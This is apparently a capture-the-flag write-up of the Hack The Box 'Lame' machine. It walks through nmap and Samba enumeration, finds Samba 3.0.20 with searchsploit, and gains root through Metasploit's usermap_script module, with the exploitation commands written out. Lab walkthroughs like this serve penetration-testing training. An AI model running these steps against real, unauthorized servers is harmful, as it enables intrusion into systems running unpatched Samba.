Scanning and Enumerating
As usual, let’s start with nmap:
$ nmap -sC -sV -oA lame 10.10.10.3 👀
Since this can sometimes take time and because it’s important to document, I save it to a file:
$ cat ~/Documents/nmap/lame.nmap
Trying Anonymous FTP
I tried logging in to FTP anonymously. The ftp package wasn’t installed so I had to install it:
$ apt install ftp
I was then able to log in successfully with the username: anonymous and password: password.
$ ftp 10.10.10.3
Once in I listed the contents
$ ls -la and it doesn’t look promising because there are no files or directories listed.
Moving on to Samba
In the nmap scan I didn’t get an actual Samba version so I had to do a bit more enumeration on Samba specifically. I’ve never really messed with Samba so I Googled: ‘site: kali.org samba’ and found two tools: SMBMap and enum4linux. SMBMap didn’t give me any version numbers, so I tried:
$ enum4linux 10.10.10.3 and boom
lame server (Samba 3.0.20-Debian) was in the results:
Now we can look for a Samba 3.0.20 exploit:
$ searchsploit samba 3.0.20
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Com | exploits/unix/remote/16320.rb and a heap overflow exploit. ‘Username map script’ is a command execution attack and that sounds more straight forward than a heap overflow so I tried first.
Exploiting Samba with Metasploit
I tried the usual way for using an exploit with Metasploit
$ cp /usr/share/exploitdb/exploits/unix/remote/16320.rb /root/.msf4/modules/exploits/unix/remote
fired up Metasploit and ran the exploit
$ msfconsole msf5 > use exploit/unix/remote/16320.rb msf5 > set RHOST 10.10.10.3 msf5 > exploit
I was able to use the exploit, but I kept getting an error. 😕
Exploit failed: NameError undefined local variable or method `connect' for #[Msf:0x00005626cbd4fb50](msf:0x00005626cbd4fb50)
After a couple of tries I searched for an exploit in msf:
search samba 3.0.20. It looks like Searchsploit had the wrong path, in Metasploit it’s at:
So I try again
msf5 > use exploit/multi/samba/usermap_script msf5 > set RHOST 10.10.10.3 msf5 > msf5 > exploit
And we have a successful ecploiy, I mean, exploit. \o/
Capture the Flags
whoami I’m root, nice.
Change to the root directory
cd /root and there is the root flag.
Get the flag:
$ cat root.txt
Now let’s see if we can easily find that user flag:
$ find / -name user.txt
That was simple:
Get the flag:
$ cat /home/makis/user.txt
- Sometimes the most obvious, possible vulnerability isn't the best route. Enumerate more.
- Update your server software to avoid being vulnerable to easily exploitable bugs